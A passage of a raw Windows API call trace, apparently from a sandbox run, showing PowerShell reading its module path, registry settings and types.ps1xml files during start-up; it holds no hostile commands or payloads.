	[0269.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.025] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.025] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0269.025] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.026] CoTaskMemAlloc (cb=0xcc) returned 0x1b6d0d90
	[0269.027] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6d0d90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0269.027] CoTaskMemFree (pv=0x1b6d0d90) 
	[0269.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d888 | out: phkResult=0x16d888*=0x328) returned 0x0
	[0269.027] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d80c, lpData=0x0, lpcbData=0x16d808*=0x0 | out: lpType=0x16d80c*=0x2, lpData=0x0, lpcbData=0x16d808*=0x6c) returned 0x0
	[0269.027] CoTaskMemAlloc (cb=0x70) returned 0x261110
	[0269.027] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d7dc, lpData=0x261110, lpcbData=0x16d7d8*=0x6c | out: lpType=0x16d7dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x16d7d8*=0x6c) returned 0x0
	[0269.027] CoTaskMemFree (pv=0x261110) 
	[0269.027] CoTaskMemAlloc (cb=0xcc) returned 0x1b6d0d90
	[0269.027] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b6d0d90, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0269.027] CoTaskMemFree (pv=0x1b6d0d90) 
	[0269.027] CoTaskMemAlloc (cb=0xcc) returned 0x1b6d0d90
	[0269.027] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6d0d90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0269.027] CoTaskMemFree (pv=0x1b6d0d90) 
	[0269.030] RegCloseKey (hKey=0x328) returned 0x0
	[0269.030] CoTaskMemAlloc (cb=0xcc) returned 0x1b6d0d90
	[0269.030] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b6d0d90, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0269.030] CoTaskMemFree (pv=0x1b6d0d90) 
	[0269.030] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d888 | out: phkResult=0x16d888*=0x328) returned 0x0
	[0269.030] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x16d80c, lpData=0x0, lpcbData=0x16d808*=0x0 | out: lpType=0x16d80c*=0x0, lpData=0x0, lpcbData=0x16d808*=0x0) returned 0x2
	[0269.030] RegCloseKey (hKey=0x328) returned 0x0
	[0269.034] CoTaskMemAlloc (cb=0x20c) returned 0x2ba390
	[0269.035] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2ba390 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0269.036] CoTaskMemFree (pv=0x2ba390) 
	[0269.036] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0269.037] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0269.041] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.042] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.043] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.043] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.048] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.048] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.049] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.049] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.051] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d678 | out: phkResult=0x16d678*=0x330) returned 0x0
	[0269.051] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d68c, lpData=0x0, lpcbData=0x16d688*=0x0 | out: lpType=0x16d68c*=0x1, lpData=0x0, lpcbData=0x16d688*=0x74) returned 0x0
	[0269.052] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d5fc, lpData=0x0, lpcbData=0x16d5f8*=0x0 | out: lpType=0x16d5fc*=0x1, lpData=0x0, lpcbData=0x16d5f8*=0x74) returned 0x0
	[0269.052] CoTaskMemAlloc (cb=0x78) returned 0x261110
	[0269.052] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x16d5cc, lpData=0x261110, lpcbData=0x16d5c8*=0x74 | out: lpType=0x16d5cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d5c8*=0x74) returned 0x0
	[0269.052] CoTaskMemFree (pv=0x261110) 
	[0269.052] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0269.052] SetErrorMode (uMode=0x1) returned 0x1
	[0269.052] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d550 | out: lpFileInformation=0x16d550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0269.052] SetErrorMode (uMode=0x1) returned 0x1
	[0269.053] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.053] SetErrorMode (uMode=0x1) returned 0x1
	[0269.053] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d550 | out: lpFileInformation=0x16d550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0269.053] SetErrorMode (uMode=0x1) returned 0x1
	[0269.055] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0269.055] SetErrorMode (uMode=0x1) returned 0x1
	[0269.056] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d550 | out: lpFileInformation=0x16d550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0269.056] SetErrorMode (uMode=0x1) returned 0x1
	[0269.056] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.056] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.056] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.587] CoTaskMemAlloc (cb=0x104) returned 0x2ca2e0
	[0269.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca2e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.587] CoTaskMemFree (pv=0x2ca2e0) 
	[0269.588] GetACP () returned 0x4e4
	[0269.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.594] SetErrorMode (uMode=0x1) returned 0x1
	[0269.594] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0269.594] GetFileType (hFile=0x334) returned 0x1
	[0269.594] SetErrorMode (uMode=0x1) returned 0x1
	[0269.594] GetFileType (hFile=0x334) returned 0x1
	[0269.596] ReadFile (in: hFile=0x334, lpBuffer=0x2dc8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc8a08*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0269.598] ReadFile (in: hFile=0x334, lpBuffer=0x2dc8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc8a08*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0269.598] ReadFile (in: hFile=0x334, lpBuffer=0x2dc8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc8a08*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0269.598] ReadFile (in: hFile=0x334, lpBuffer=0x2dc8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc8a08*, lpNumberOfBytesRead=0x16d488*=0xcf3, lpOverlapped=0x0) returned 1
	[0269.598] ReadFile (in: hFile=0x334, lpBuffer=0x2dc7e63, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc7e63*, lpNumberOfBytesRead=0x16d488*=0x0, lpOverlapped=0x0) returned 1
	[0269.599] ReadFile (in: hFile=0x334, lpBuffer=0x2dc8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2dc8a08*, lpNumberOfBytesRead=0x16d488*=0x0, lpOverlapped=0x0) returned 1
	[0269.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.601] SetErrorMode (uMode=0x1) returned 0x1
	[0269.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d400 | out: lpFileInformation=0x16d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0269.602] SetErrorMode (uMode=0x1) returned 0x1
	[0269.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d4e8 | out: phkResult=0x16d4e8*=0x334) returned 0x0
	[0269.603] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d46c, lpData=0x0, lpcbData=0x16d468*=0x0 | out: lpType=0x16d46c*=0x1, lpData=0x0, lpcbData=0x16d468*=0x56) returned 0x0
	[0269.603] CoTaskMemAlloc (cb=0x5a) returned 0x2ddfc0
	[0269.603] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d43c, lpData=0x2ddfc0, lpcbData=0x16d438*=0x56 | out: lpType=0x16d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d438*=0x56) returned 0x0
	[0269.603] CoTaskMemFree (pv=0x2ddfc0) 
	[0269.603] RegCloseKey (hKey=0x334) returned 0x0
	[0269.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0269.621] GetSystemInfo (in: lpSystemInfo=0x16c120 | out: lpSystemInfo=0x16c120*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0269.621] VirtualQuery (in: lpAddress=0x16c1d0, lpBuffer=0x16d090, dwLength=0x30 | out: lpBuffer=0x16d090*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0270.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0270.212] SetErrorMode (uMode=0x1) returned 0x1
	[0270.212] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0270.212] GetFileType (hFile=0x334) returned 0x1
	[0270.212] SetErrorMode (uMode=0x1) returned 0x1
	[0270.212] GetFileType (hFile=0x334) returned 0x1
	[0270.213] ReadFile (in: hFile=0x334, lpBuffer=0x2e2fbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2e2fbc8*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.221] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.221] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.221] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.222] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.222] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.222] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.222] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.222] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.223] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.223] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.223] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.224] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.224] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.224] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.224] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.225] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.226] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.226] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.230] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.230] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.230] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.230] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.230] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.231] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.231] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.231] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.231] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.232] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.232] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.232] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.232] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.232] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.235] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.235] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
	[0270.235] ReadFile (in: hFile=0x334, lpBuffer=0x2c95780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d488, lpOverlapped=0x0 | out: lpBuffer=0x2c95780*, lpNumberOfBytesRead=0x16d488*=0x1000, lpOverlapped=0x0) returned 1
